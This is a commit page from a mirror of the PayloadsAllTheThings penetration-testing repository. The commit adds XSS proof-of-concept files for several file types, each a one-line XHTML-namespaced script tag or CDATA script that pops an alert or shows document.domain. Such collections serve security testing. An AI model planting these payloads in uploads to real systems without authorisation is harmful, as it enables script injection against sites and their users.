1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-23 09:06:08 +02:00

XSS in several filetype based on @__Mn1__ blogpost

This commit is contained in:
Swissky 2019-03-26 21:49:03 +01:00
parent 90b182f10f
commit bbc9029dd6
18 changed files with 18 additions and 1 deletions

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<script>alert(1)</script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<script>alert(1)</script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<script>alert(1)</script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -2,7 +2,7 @@
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>